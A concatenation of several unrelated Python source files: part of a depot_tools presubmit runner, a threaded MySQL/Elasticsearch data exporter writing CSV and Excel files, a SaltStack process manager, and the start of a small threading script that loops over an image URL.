self.gerrit = gerrit_obj
self.verbose = verbose
self.dry_run = dry_run
self.more_cc = []
self.thread_pool = thread_pool
self.parallel = parallel
def ExecPresubmitScript(self, script_text, presubmit_path):
"""Executes a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: The path to the presubmit file (this will be reported via
input_api.PresubmitLocalPath()).
Return:
A list of result objects, empty if no problems.
"""
# Change to the presubmit file's directory to support local imports.
main_path = os.getcwd()
presubmit_dir = os.path.dirname(presubmit_path)
os.chdir(presubmit_dir)
# Load the presubmit script into context.
input_api = InputApi(self.change, presubmit_path, self.committing,
self.verbose, gerrit_obj=self.gerrit,
dry_run=self.dry_run, thread_pool=self.thread_pool,
parallel=self.parallel)
output_api = OutputApi(self.committing)
context = {}
# Try to figure out whether these presubmit checks should be run under
# python2 or python3. We need to do this without actually trying to
# compile the text, since the text might compile in one but not the
# other.
m = re.search('^USE_PYTHON3 = True$', script_text, flags=re.MULTILINE)
use_python3 = m is not None
if (((sys.version_info.major == 2) and use_python3) or
((sys.version_info.major == 3) and not use_python3)):
return []
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))
context['__args'] = (input_api, output_api)
# Get path of presubmit directory relative to repository root.
# Always use forward slashes, so that path is same in *nix and Windows
root = input_api.change.RepositoryRoot()
rel_path = os.path.relpath(presubmit_dir, root)
rel_path = rel_path.replace(os.path.sep, '/')
# Get the URL of git remote origin and use it to identify host and project
host = project = ''
if self.gerrit:
host = self.gerrit.host or ''
project = self.gerrit.project or ''
# Prefix for test names
prefix = 'presubmit:%s/%s:%s/' % (host, project, rel_path)
# Perform all the desired presubmit checks.
results = []
try:
version = [
int(x) for x in context.get('PRESUBMIT_VERSION', '0.0.0').split('.')
]
with rdb_wrapper.client(prefix) as sink:
if version >= [2, 0, 0]:
for function_name in context:
if not function_name.startswith('Check'):
continue
if function_name.endswith('Commit') and not self.committing:
continue
if function_name.endswith('Upload') and self.committing:
continue
logging.debug('Running %s in %s', function_name, presubmit_path)
results.extend(
self._run_check_function(function_name, context, sink))
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
else: # Old format
if self.committing:
function_name = 'CheckChangeOnCommit'
else:
function_name = 'CheckChangeOnUpload'
if function_name in context:
logging.debug('Running %s in %s', function_name, presubmit_path)
results.extend(
self._run_check_function(function_name, context, sink))
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
finally:
for f in input_api._named_temporary_files:
os.remove(f)
# Return the process to the original working directory.
os.chdir(main_path)
return results
def _run_check_function(self, function_name, context, sink=None):
"""Evaluates and returns the result of a given presubmit function.
If sink is given, the result of the presubmit function will be reported
to the ResultSink.
Args:
function_name: the name of the presubmit function to evaluate
context: a context dictionary in which the function will be evaluated
sink: an instance of ResultSink. None, by default.
Returns:
the result of the presubmit function call.
"""
start_time = time_time()
try:
result = eval(function_name + '(*__args)', context)
self._check_result_type(result)
except Exception:
if sink:
elapsed_time = time_time() - start_time
sink.report(function_name, rdb_wrapper.STATUS_FAIL, elapsed_time)
# TODO(crbug.com/953884): replace reraise with native py3:
# raise .. from e
e_type, e_value, e_tb = sys.exc_info()
print('Evaluation of %s failed: %s' % (function_name, e_value))
six.reraise(e_type, e_value, e_tb)
elapsed_time = time_time() - start_time
if elapsed_time > 10.0:
sys.stdout.write(
'%s took %.1fs to run.\n' % (function_name, elapsed_time))
if sink:
status = rdb_wrapper.STATUS_PASS
if any(r.fatal for r in result):
status = rdb_wrapper.STATUS_FAIL
sink.report(function_name, status, elapsed_time)
return result
def _check_result_type(self, result):
"""Helper function which ensures result is a list, and all elements are
instances of OutputApi.PresubmitResult"""
if not isinstance(result, (tuple, list)):
raise PresubmitFailure('Presubmit functions must return a tuple or list')
if not all(isinstance(res, OutputApi.PresubmitResult) for res in result):
raise PresubmitFailure(
'All presubmit results must be of types derived from '
'output_api.PresubmitResult')
def DoPresubmitChecks(change,
committing,
verbose,
default_presubmit,
may_prompt,
gerrit_obj,
dry_run=None,
parallel=False,
json_output=None):
"""Runs all presubmit checks that apply to the files in the change.
This finds all PRESUBMIT.py files in directories enclosing the files in the
change (up to the repository root) and calls the relevant entrypoint function
depending on whether the change is being committed or uploaded.
Prints errors, warnings and notifications. Prompts the user for warnings
when needed.
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
verbose: Prints debug info.
default_presubmit: A default presubmit script to execute in any case.
may_prompt: Enable (y/n) questions on warning or error. If False,
any questions are answered with yes by default.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests specified by input_api.RunTests in all
PRESUBMIT files will be run in parallel.
Return:
1 if presubmit checks failed or 0 otherwise.
"""
old_environ = os.environ
try:
# Make sure python subprocesses won't generate .pyc files.
os.environ = os.environ.copy()
os.environ['PYTHONDONTWRITEBYTECODE'] = '1'
python_version = 'Python %s' % sys.version_info.major
if committing:
sys.stdout.write('Running %s presubmit commit checks ...\n' %
python_version)
else:
sys.stdout.write('Running %s presubmit upload checks ...\n' %
python_version)
start_time = time_time()
presubmit_files = ListRelevantPresubmitFiles(
change.AbsoluteLocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
results = []
thread_pool = ThreadPool()
executer = PresubmitExecuter(change, committing, verbose, gerrit_obj,
dry_run, thread_pool, parallel)
if default_presubmit:
if verbose:
sys.stdout.write('Running default presubmit script.\n')
fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
results += executer.ExecPresubmitScript(default_presubmit, fake_path)
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
sys.stdout.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results += executer.ExecPresubmitScript(presubmit_script, filename)
results += thread_pool.RunAsync()
messages = {}
should_prompt = False
presubmits_failed = False
for result in results:
if result.fatal:
presubmits_failed = True
messages.setdefault('ERRORS', []).append(result)
elif result.should_prompt:
should_prompt = True
messages.setdefault('Warnings', []).append(result)
else:
messages.setdefault('Messages', []).append(result)
sys.stdout.write('\n')
for name, items in messages.items():
sys.stdout.write('** Presubmit %s **\n' % name)
for item in items:
item.handle()
sys.stdout.write('\n')
total_time = time_time() - start_time
if total_time > 1.0:
sys.stdout.write(
'Presubmit checks took %.1fs to calculate.\n\n' % total_time)
if not should_prompt and not presubmits_failed:
sys.stdout.write('%s presubmit checks passed.\n' % python_version)
elif should_prompt:
sys.stdout.write('There were %s presubmit warnings. ' % python_version)
if may_prompt:
presubmits_failed = not prompt_should_continue(
'Are you sure you wish to continue? (y/N): ')
else:
sys.stdout.write('\n')
if json_output:
# Write the presubmit results to json output
presubmit_results = {
'errors': [
error.json_format()
for error in messages.get('ERRORS', [])
],
'notifications': [
notification.json_format()
for notification in messages.get('Messages', [])
],
'warnings': [
warning.json_format()
for warning in messages.get('Warnings', [])
],
'more_cc': executer.more_cc,
}
gclient_utils.FileWrite(
json_output, json.dumps(presubmit_results, sort_keys=True))
global _ASKED_FOR_FEEDBACK
# Ask for feedback one time out of 5.
if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
sys.stdout.write(
'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
'to figure out which PRESUBMIT.py was run, then run git blame\n'
'on the file to figure out who to ask for help.\n')
_ASKED_FOR_FEEDBACK = True
return 1 if presubmits_failed else 0
finally:
os.environ = old_environ
def _scan_sub_dirs(mask, recursive):
if not recursive:
return [x for x in glob.glob(mask) if x not in ('.svn', '.git')]
results = []
for root, dirs, files in os.walk('.'):
if '.svn' in dirs:
dirs.remove('.svn')
if '.git' in dirs:
dirs.remove('.git')
for name in files:
if fnmatch.fnmatch(name, mask):
results.append(os.path.join(root, name))
return results
def _parse_files(args, recursive):
logging.debug('Searching for %s', args)
files = []
for arg in args:
files.extend([('M', f) for f in _scan_sub_dirs(arg, recursive)])
return files
def _parse_change(parser, options):
"""Process change options.
Args:
parser: The parser used to parse the arguments from command line.
options: The arguments parsed from command line.
Returns:
A GitChange if the change root is a git repository, or a Change otherwise.
"""
if options.files and options.all_files:
parser.error('<files> cannot be specified when --all-files is set.')
change_scm = scm.determine_scm(options.root)
if change_scm != 'git' and not options.files:
parser.error('<files> is not optional for unversioned directories.')
if options.files:
change_files = _parse_files(options.files, options.recursive)
elif options.all_files:
change_files = [('M', f) for f in scm.GIT.GetAllFiles(options.root)]
else:
change_files = scm.GIT.CaptureStatus(
options.root, options.upstream or None)
logging.info('Found %d file(s).', len(change_files))
change_class = GitChange if change_scm == 'git' else Change
return change_class(
options.name,
options.description,
options.root,
change_files,
options.issue,
options.patchset,
options.author,
upstream=options.upstream)
def _parse_gerrit_options(parser, options):
"""Process gerrit options.
SIDE EFFECTS: Modifies options.author and options.description from Gerrit if
options.gerrit_fetch is set.
Args:
parser: The parser used to parse the arguments from command line.
options: The arguments parsed from command line.
Returns:
A GerritAccessor object if options.gerrit_url is set, or None otherwise.
"""
gerrit_obj = None
if options.gerrit_url:
gerrit_obj = GerritAccessor(
url=options.gerrit_url,
project=options.gerrit_project,
branch=options.gerrit_branch)
if not options.gerrit_fetch:
return gerrit_obj
if not options.gerrit_url or not options.issue or not options.patchset:
parser.error(
'--gerrit_fetch requires --gerrit_url, --issue and --patchset.')
options.author = gerrit_obj.GetChangeOwner(options.issue)
options.description = gerrit_obj.GetChangeDescription(
options.issue, options.patchset)
logging.info('Got author: "%s"', options.author)
logging.info('Got description: """\n%s\n"""', options.description)
return gerrit_obj
@contextlib.contextmanager
def canned_check_filter(method_names):
filtered = {}
try:
for method_name in method_names:
if not hasattr(presubmit_canned_checks, method_name):
logging.warning('Skipping unknown "canned" check %s' % method_name)
continue
filtered[method_name] = getattr(presubmit_canned_checks, method_name)
setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
yield
finally:
for name, method in filtered.items():
setattr(presubmit_canned_checks, name, method)
def main(argv=None):
parser = argparse.ArgumentParser(usage='%(prog)s [options] <files...>')
hooks = parser.add_mutually_exclusive_group()
hooks.add_argument('-c', '--commit', action='store_true',
help='Use commit instead of upload checks.')
hooks.add_argument('-u', '--upload', action='store_false', dest='commit',
help='Use upload instead of commit checks.')
hooks.add_argument('--post_upload', action='store_true',
help='Run post-upload commit hooks.')
parser.add_argument('-r', '--recursive', action='store_true',
help='Act recursively.')
parser.add_argument('-v', '--verbose', action='count', default=0,
help='Use 2 times for more debug info.')
parser.add_argument('--name', default='no name')
parser.add_argument('--author')
desc = parser.add_mutually_exclusive_group()
desc.add_argument('--description', default='', help='The change description.')
desc.add_argument('--description_file',
help='File to read change description from.')
parser.add_argument('--issue', type=int, default=0)
parser.add_argument('--patchset', type=int, default=0)
parser.add_argument('--root', default=os.getcwd(),
help='Search for PRESUBMIT.py up to this directory. '
'If inherit-review-settings-ok is present in this '
'directory, parent directories up to the root file '
'system directories will also be searched.')
parser.add_argument('--upstream',
help='Git only: the base ref or upstream branch against '
'which the diff should be computed.')
parser.add_argument('--default_presubmit')
parser.add_argument('--may_prompt', action='store_true', default=False)
parser.add_argument('--skip_canned', action='append', default=[],
help='A list of checks to skip which appear in '
'presubmit_canned_checks. Can be provided multiple times '
'to skip multiple canned checks.')
parser.add_argument('--dry_run', action='store_true', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_url', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_project', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_branch', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_fetch', action='store_true',
help=argparse.SUPPRESS)
parser.add_argument('--parallel', action='store_true',
help='Run all tests specified by input_api.RunTests in '
'all PRESUBMIT files in parallel.')
parser.add_argument('--json_output',
help='Write presubmit errors to json output.')
parser.add_argument('--all_files', action='store_true',
help='Mark all files under source control as modified.')
parser.add_argument('files', nargs='*',
help='List of files to be marked as modified when '
'executing presubmit or post-upload hooks. fnmatch '
'wildcards can also be used.')
options = parser.parse_args(argv)
log_level = logging.ERROR
if options.verbose >= 2:
log_level = logging.DEBUG
elif options.verbose:
log_level = logging.INFO
log_format = ('[%(levelname).1s%(asctime)s %(process)d %(thread)d '
'%(filename)s] %(message)s')
logging.basicConfig(format=log_format, level=log_level)
if options.description_file:
options.description = gclient_utils.FileRead(options.description_file)
gerrit_obj = _parse_gerrit_options(parser, options)
change = _parse_change(parser, options)
try:
if options.post_upload:
return DoPostUploadExecuter(
change,
gerrit_obj,
options.verbose)
with canned_check_filter(options.skip_canned):
return DoPresubmitChecks(
change,
options.commit,
options.verbose,
options.default_presubmit,
options.may_prompt,
gerrit_obj,
options.dry_run,
options.parallel,
options.json_output)
except PresubmitFailure as e:
print(e, file=sys.stderr)
print('Maybe your depot_tools is out of date?', file=sys.stderr)
return 2
if __name__ == '__main__':
fix_encoding.fix_encoding()
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(2)
|
Exporter.py
|
# -*- coding:utf-8 -*-
__all__ = ['Exporter']
import sys, os, threading,math,traceback,gc,json,re,time
import requests,pymysql,xlsxwriter
from pymysql.cursors import DictCursor
from lib.Base import Base
class Exporter(Base):
rootPath = os.path.dirname(os.path.realpath(sys.argv[0]))
tmpPath = rootPath + '/tmp'
dataDir = tmpPath + '/export-data'
dataPath = dataDir + '/page-{page}.csv'
dataInfoDir = tmpPath + '/export-info'
dataInfoPath = dataInfoDir + '/page-{page}.json'
taskInfoPath = dataInfoDir + '/task.json'
errorLogPath = dataInfoDir + '/error.log'
db_list = []
threadList = []
cfg = {}
def __init__(self, inited=True):
super().__init__(inited)
#print('exporter __init__')
def parent(self):
return super()
def init(self):
super().init()
#print('exporter init')
try:
if not os.path.exists(self.dataDir):
os.mkdir(self.dataDir)
if not os.path.exists(self.dataInfoDir):
os.mkdir(self.dataInfoDir)
except:
traceback.print_exc()
self.log('Can not create [/export-data] or [/export-info] path.', ['exit', None])
def loadConfig(self):
super().loadConfig()
self.cfg = self.config['Export'] if self.config else None
#extract
if self.cfg and self.cfg[self.cfg['extractSection']]:
for k, v in self.cfg[self.cfg['extractSection']].items():
self.cfg[k] = v
return self.cfg
'''
def log(self, str, extra=None):
#print('----------------------', end="\n")
#print(str, end="\n")
pass
'''
def __del__(self):
self.closeConnect()
def getMysqlData(self, sql, page):
if len(self.db_list) < 1:
self.db_list.append(None)
try:
self.db_list[page - 1] = pymysql.connect(
host=self.cfg['host'],
port=self.cfg['port'],
user=self.cfg['user'],
password=self.cfg['password'],
database=self.cfg['database'],
charset=self.cfg['charset'],
connect_timeout=self.cfg['connectTimeout']
)
#self.db_list[page - 1].ping(reconnect=True)
cursor = self.db_list[page - 1].cursor(DictCursor)
cursor.execute(sql)
results = cursor.fetchall()
#gc
self.db_list[page - 1].close()
self.db_list[page - 1] = None
del cursor
gc.collect()
return results
except Exception as e:
self.log('The page %d mysql data can not been fetched, Sql: %s, Error: %s' % (page, sql, e.__str__()), ['error', None])
return None
def getElasticsearchData(self, query, page):
headers = json.loads(self.cfg['headers']) if self.cfg['headers'] else {}
cookies = json.loads(self.cfg['cookies']) if self.cfg['cookies'] else {}
try:
response = requests.post(self.cfg['url'], data=query, timeout=self.cfg['connectTimeout'], headers=headers, cookies=cookies, verify=False)
except Exception as e:
response = None
self.log('The page %d request failure, HTTP Error: %s' % (page, e.__str__()), ['error', None])
if response == None or response.status_code != 200:
self.log('The page %d request failure, Error: %s' % (page, 'None' if response == None else response.text), ['error', None])
return None
#print(response.text)
try:
content = json.loads(response.text)
except Exception as e:
self.log('The page %d parse json data failure, Error: %s' % (page, e.__str__()), ['error', None])
return None
ret = []
for item in content['hits']['hits']:
ret.append(dict({"_index":item['_index'],"_type":item['_type'],"_id":item['_id']}, **item['_source']))
#print(ret)
#gc
del content
del response
return ret
def getHttpFile(self, sql, page):
headers = json.loads(self.cfg['headers']) if self.cfg['headers'] else {}
cookies = json.loads(self.cfg['cookies']) if self.cfg['cookies'] else {}
try:
response = requests.post(self.cfg['url'], data=sql, timeout=self.cfg['connectTimeout'], headers=headers, cookies=cookies, verify=False)
except Exception as e:
response = None
self.log('The page %d occur HTTP Error: %s' % (page, e.__str__()), ['error', None])
if response == None or response.status_code != 200:
self.log('The page %d request failure, Error: %s' % (page, 'None' if response == None else response.text), ['error', None])
return None
content = response.content.decode()
r = re.match(r'^(\d+)\n.*', content)
total = int(r[1])
return {"total": total, "content": content[len(r[1])+1:]}
def fetchData(self, sql, page):
if self.cfg['driver'] == 'mysql':
return self.getMysqlData(sql, page)
elif self.cfg['driver'] == 'elasticsearch':
return self.getElasticsearchData(sql, page)
elif self.cfg['driver'] == 'http-file':
return self.getHttpFile(sql, page)
def closeConnect(self):
for i in self.db_list:
if i and not i._closed:
i.close()
def stopTask(self):
self.taskStatus = -1
self.closeConnect()
gc.collect()
def runTask(self, resumeRun=False, loopRun=False):
self.loadConfig()
if not resumeRun:
self.log('Start clearing export data dir...')
self.clearDir(self.dataDir)
self.log('Start clearing export info dir...')
self.clearDir(self.dataInfoDir)
gc.collect()
self.threadList.clear()
self.threadLock = threading.Semaphore(self.cfg['maxThreadNum'])
self.taskStatus = 1
self.taskFinished = -1 if self.isLoopTask() else 0
totalPage = self.getTotalPage()
self.log('Start running export task...')
#thread
for i in range(1, totalPage + 1):
self.db_list.append(None)
#start
if not self.isLoopTask() and os.path.exists(self.dataInfoPath.format(page=i)):
self.taskFinished += 1
elif self.isLoopTask() and i <= self.getTaskInfo()['page']:
self.taskFinished += 1
else:
t = threading.Thread(target=self.exportData,args=(i, self.getTaskInfo()['end']+1 if self.isLoopTask() else None))
self.threadList.append(t)
#start thread
for v in self.threadList:
k = v._args[0]
if self.taskStatus < 0:
self.log('Thread export-%d has been interrupted without starting' % k)
break
self.threadLock.acquire()
v.start()
self.log('Thread export-%d has started.' % k, ['progress', self.getProgress('progress')])
self.log('All %d threads have been started' % len(self.threadList))
for (k, v) in enumerate(self.threadList):
if self.taskStatus < 0:
self.log('Thread-%d has been interrupted without ending' % (k+1))
break
v.join()
self.log('Thread-%d has finished' % (k+1), ['progress', self.getProgress('progress')])
#finish
if self.taskStatus == 1:
self.taskStatus = 0
self.threadList.clear()
gc.collect()
#loop
if loopRun and self.taskStatus>=0 and self.taskFinished<totalPage:
self.log('Loop to run export task...')
time.sleep(self.cfg['loopSleepTime'])
if self.taskStatus>=0:
self.runTask(True, True)
else:
self.log('Export task has finished', ['end', self.getProgress('end')])
def parseSQL(self, sql, page, s, e):
sql = sql.replace('{start}',str(s))
sql = sql.replace('{end}',str(e))
sql = sql.replace('{page}',str(page))
sql = sql.replace('{offset}',str((page-1) * self.cfg['pageSize']))
sql = sql.replace('{size}',str(self.cfg['pageSize']))
return sql
def exportData(self, page, startLine=None):
if self.taskStatus < 0:
self.log('Thread export-%d has been interrupted' % page)
self.threadLock and self.threadLock.release()
return
totalPage = self.getTotalPage()
self.log('Exporting the page %d, total %d pages...' % (page, totalPage))
if self.isLoopTask():
s = startLine
e = s + self.cfg['pageSize']
else:
s = (page - 1) * self.cfg['pageSize'] + self.cfg['startLine']
e = s + self.cfg['pageSize']
e = self.cfg['endLine'] if e > self.cfg['endLine'] else e
#last page
if page >= totalPage:
e = e + 1
sql = self.parseSQL(self.cfg['sql'], page, s, e)
self.log(sql)
d = self.fetchData(sql, page)
#print(d)
if self.cfg['driver'] == 'http-file':
if self.isLoopTask() :
if d and d["total"] > 0:
self.saveFileData(d, page, s, e)
else:
if not self.isEmpty('checkSql', self.cfg):
self.log('Checking the page %d data...' % page)
sql2 = self.parseSQL(self.cfg['checkSql'], page, s, e)
self.log(sql2)
d2 = self.fetchData(sql2, page)
if d2 and d2["total"] > 0:
self.saveFileData(d2, page, s, e)
else:
self.log('The page %d is empty' % page)
else:
self.log('The page %d may be empty' % page)
else:
if d and d['total']>=0:
self.saveFileData(d, page, s, e)
else:
self.log('The page %d is empty' % page, ['error', None])
else:
if self.isLoopTask() :
if len(d) > 0:
self.savePostData(d, page, s, e)
else:
if not self.isEmpty('checkSql', self.cfg):
self.log('Checking the page %d data...' % page)
sql2 = self.parseSQL(self.cfg['checkSql'], page, s, e)
self.log(sql2)
d2 = self.fetchData(sql2, page)
if d2 and len(d2) > 0:
self.savePostData(d2, page, s, e)
else:
self.log('The page %d is empty' % page)
else:
self.log('The page %d may be empty' % page)
else:
if d != None:
self.savePostData(d, page, s, e)
else:
self.log('The page %d is empty' % page, ['error', None])
#gc
del d
gc.collect()
self.threadLock and self.threadLock.release()
def saveFileData(self, data, page, startLine, endLine):
if self.taskStatus < 0:
self.log('Thread export-%d has been interrupted' % page)
return
self.log('Start exporting the page %d, total %d items...' % (page, data['total']))
#save data
with open(self.dataPath.format(page=str(page)), "wb") as f:
f.write((self.cfg['exportPrefix'] + data['content'] + self.cfg['exportSubfix']).encode(self.cfg['exportCharset'], 'ignore'))
self.taskFinished += 1
self.log('The page %d info has saved successfully' % page, ['update', self.getProgress('progress'), data['total'], 0])
#save info
with open(self.dataInfoPath.format(page=str(page)), "w", encoding="utf-8") as f:
f.write('{"total":%d,"error":0,"start":%d,"end":%d}' % (data['total'], startLine, endLine))
#save task
if self.isLoopTask():
self.saveTaskInfo(page, startLine, endLine, data['total'], 0)
return
def getCsvData(self, d):
s = self.cfg['exportPrefix']
for row in d:
t = self.cfg['exportBody'].replace('{field_columns}', ",".join(row.keys()))
t2 = ''
fl = len(row)
c = 0
for i, _ in row.items():
#filter
v = str(row[i]) if row[i] != None else row[i]
if self.cfg['exportFilterPattern']:
v = self.filterData(self.cfg['exportFilterPattern'], v, 'export')
#print(self.cfg['exportFilterPattern'] + '=>' + v)
if t.find('{comma_fields}') > -1:
t2 += self.cfg['exportNullValue'] if v == None else '"%s"' % v
if c < fl-1:
t2 += ','
else:
t = t.replace('{%s}' % str(i), str(v) if v != None else '')
c += 1
if t.find('{comma_fields}') > -1:
s += t.replace('{comma_fields}', t2)
else:
s += t
#gc
del t
s += self.cfg['exportSubfix']
return s
def savePostData(self, d, page, startLine, endLine):
if self.taskStatus < 0:
self.log('Thread export-%d has been interrupted' % page)
return
self.log('Start exporting the page %d, total %d items...' % (page, len(d)))
path = self.dataPath.format(page=str(page))
startLine = d[0][self.cfg['lineField']] if self.isLoopTask() and len(d) > 0 else startLine
endLine = d[0][self.cfg['lineField']] if self.isLoopTask() and len(d) > 0 else endLine-1
#sort and get min & max line
if self.isLoopTask() :
for row in d:
if row[self.cfg['lineField']] > endLine:
endLine = row[self.cfg['lineField']]
if row[self.cfg['lineField']] < startLine:
startLine = row[self.cfg['lineField']]
if self.getExportConfig('exportType') == 'excel':
try:
book = xlsxwriter.Workbook(path.replace('.csv', '.xlsx'))
except Exception as e:
self.log('Can not create page %d as excel file, Error: %s' % (page, e.__str__()))
return
sheet = book.add_worksheet('Worksheet')
startNo = 0
#header
if self.cfg['exportPrefix']:
startNo = 1
isBold = book.add_format({'bold': 1})
if self.cfg['exportPrefix'].find('{field_names}') > -1:
if d and len(d)>0:
c = 0
for k,_ in d[0].items():
sheet.write(0, c, k, isBold)
c += 1
else:
exportHeader = json.loads(self.cfg['exportPrefix'])
for i in range(0, len(exportHeader)):
sheet.write(0, i, exportHeader[i], isBold)
#cells
for k, row in enumerate(d):
c = 0
for _, v in row.items():
sheet.write(k + startNo, c, str(v) if v != None else '')
c += 1
#cancel
if self.taskStatus < 0:
self.log('Thread export-%d has been interrupted' % page)
return
try:
#save data
book.close()
self.taskFinished += 1
self.log('The page %d info has saved successfully' % page, ['update', self.getProgress('progress'), len(d), 0])
#save info
with open(self.dataInfoPath.format(page=str(page)), "w", encoding="utf-8") as f:
f.write('{"total":%d,"error":0,"start":%d,"end":%d}' % (len(d), startLine, endLine))
#save task
if self.isLoopTask():
self.saveTaskInfo(page, startLine, endLine, len(d), 0)
except Exception as e:
self.log('Save page %d as excel file failure, Error: %s' % (page, e.__str__()), ['error', None])
#gc
del book
del sheet
else:
s = self.getCsvData(d)
if self.taskStatus < 0:
del s
self.log('Thread export-%d has been interrupted' % page)
return
try:
#save data
with open(path, "wb") as f:
f.write(s.encode(self.cfg['exportCharset'], 'ignore'))
self.taskFinished += 1
self.log('The page %d info has saved successfully' % page, ['update', self.getProgress('progress'), len(d), 0])
#save info
with open(self.dataInfoPath.format(page=str(page)), "w", encoding="utf-8") as f:
f.write('{"total":%d,"error":0,"start":%d,"end":%d}' % (len(d), startLine, endLine))
#save task
if self.isLoopTask():
self.saveTaskInfo(page, startLine, endLine, len(d), 0)
except:
self.log('The page %d info saved failure' % page, ['error', None])
#gc
del s
return
|
process.py
|
# -*- coding: utf-8 -*-
# Import python libs
import logging
import os
import time
import sys
import multiprocessing
import signal
# Import salt libs
import salt.utils
log = logging.getLogger(__name__)
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
try:
import systemd.daemon
HAS_PYTHON_SYSTEMD = True
except ImportError:
HAS_PYTHON_SYSTEMD = False
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(os.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
def add_process(self, tgt, args=None, kwargs=None):
'''
Create a processes and args + kwargs
This will deterimine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if type(multiprocessing.Process) == type(tgt) and issubclass(tgt, multiprocessing.Process):
p = tgt(*args, **kwargs)
else:
p = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs)
p.start()
log.debug("Started '{0}'(*{1}, **{2} with pid {3}".format(tgt,
args,
kwargs,
p.pid))
self._process_map[p.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': p}
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info(('Process {0} ({1}) died with exit status {2},'
' restarting...').format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def run(self):
'''
Load and start all available api modules
'''
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
signal.signal(signal.SIGTERM, self.kill_children)
try:
if HAS_PYTHON_SYSTEMD and systemd.daemon.booted():
systemd.daemon.notify('READY=1')
except SystemError:
# Daemon wasn't started by systemd
pass
while True:
try:
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug(('Process of pid {0} died, not a known'
' process, will not restart').format(pid))
continue
self.restart_process(pid)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
# in case someone died while we were waiting...
self.check_children()
def check_children(self):
'''
Check the children once
'''
for pid, mapping in self._process_map.iteritems():
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args):
'''
Kill all of the children
'''
for pid, p_map in self._process_map.items():
p_map['Process'].terminate()
#
end_time = time.time() + self.wait_for_kill # when to die
while self._process_map and time.time() < end_time:
for pid, p_map in self._process_map.items():
p_map['Process'].join(0)
# This is a race condition if a signal was passed to all children
try:
del self._process_map[pid]
except KeyError:
pass
# if anyone is done after
for pid in self._process_map:
try:
os.kill(signal.SIGKILL, pid)
# in case the process has since decided to die, os.kill returns OSError
except OSError:
pass
|
threadlamba.py
|
from threading import Thread
import urllib.request
import random
t = Thread()
t.run = lambda : print("HELLO VOID")
#print("BOSS IS BOSS")
url = "https://download.gtanet.com/gtagarage/files/image_70116.jpg"
for i in range(10):
fname = str(i) + url.split("/")[-1]
